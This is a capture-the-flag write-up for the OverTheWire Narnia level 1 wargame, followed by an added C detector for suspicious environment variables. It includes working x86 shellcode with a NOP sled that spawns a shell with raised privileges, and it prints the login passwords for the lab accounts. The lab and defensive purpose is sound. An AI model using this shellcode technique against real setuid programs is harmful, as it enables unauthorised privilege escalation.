ssh -p 2226 narnia1@narnia.labs.overthewire.org
pw: efeidiedae
Let's look at the contents of narnia1.c in the /narnia/ directory.
// narnia1.c
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h> /* needed for getenv() and exit() */
int main(){
    int (*ret)();
    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }
    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();
    return 0;
}
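The main function checks whether an environment variable named EGG exists, then assigns the value of EGG to the function pointer ret and calls it.
Because ret ends up pointing at the contents of EGG, putting shellcode in the EGG environment variable and running the program should give us a shell.
The attack scenario is as follows.
Create the EGG environment variable with the command below.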
narnia1@narnia:/tmp/narnia1_tmp$ export EGG=`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
narnia1@narnia:/tmp/narnia1_tmp$
Now let's run the binary.
narnia1@narnia:/tmp/narnia1_tmp$ /narnia/narnia1
Trying to execute EGG!
$ id
uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14001(narnia1)
$
We got a shell.
id: narnia2
pw: nairiepecu
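From the defender's side, the EGG value used above stands out: a long run of 0x90 bytes followed by binary data is not what a normal environment variable holds. The following is an added example, not part of the original write-up or of the narnia sources, that scans an environment block for such entries; the function names, the thresholds and the sample entries are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#define NOP_RUN_MIN 16      /* assumed threshold: 0x90 bytes in a row */
#define NONPRINT_PCT_MIN 30 /* assumed threshold: % of non-printable bytes */

/* Longest run of the x86 NOP opcode (0x90) in a value. */
size_t longest_nop_run(const unsigned char *v, size_t len) {
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (v[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Percentage of bytes outside printable ASCII (UTF-8 text also counts). */
unsigned nonprintable_pct(const unsigned char *v, size_t len) {
    size_t bad = 0;
    for (size_t i = 0; i < len; i++)
        if (v[i] < 0x20 || v[i] > 0x7e) bad++;
    return len ? (unsigned)(bad * 100 / len) : 0;
}

/* 1 when a "NAME=value" entry holds a NOP run or mostly binary bytes. */
int env_entry_suspicious(const char *entry) {
    const char *eq = strchr(entry, '=');
    if (eq == NULL) return 0; /* malformed entry, nothing to scan */
    const unsigned char *v = (const unsigned char *)eq + 1;
    size_t len = strlen(eq + 1);
    return longest_nop_run(v, len) >= NOP_RUN_MIN ||
           nonprintable_pct(v, len) >= NONPRINT_PCT_MIN;
}

/* Scan a NULL-terminated environment block and report flagged names. */
int count_suspicious(char *const envp[]) {
    int hits = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (!env_entry_suspicious(envp[i])) continue;
        printf("suspicious variable: %.*s\n", (int)strcspn(envp[i], "="), envp[i]);
        hits++;
    }
    return hits;
}
int main(void) {
    char egg[64] = "EGG="; /* constructed sample, not working shellcode */
    memset(egg + 4, 0x90, 32);
    char *const sample[] = { "PATH=/usr/bin:/bin", "HOME=/home/narnia1", egg, NULL };
    return count_suspicious(sample) == 1 ? 0 : 1;
}
```

Values containing legitimate non-ASCII text will trip the non-printable check, so the NOP-run test is the more specific of the two signals.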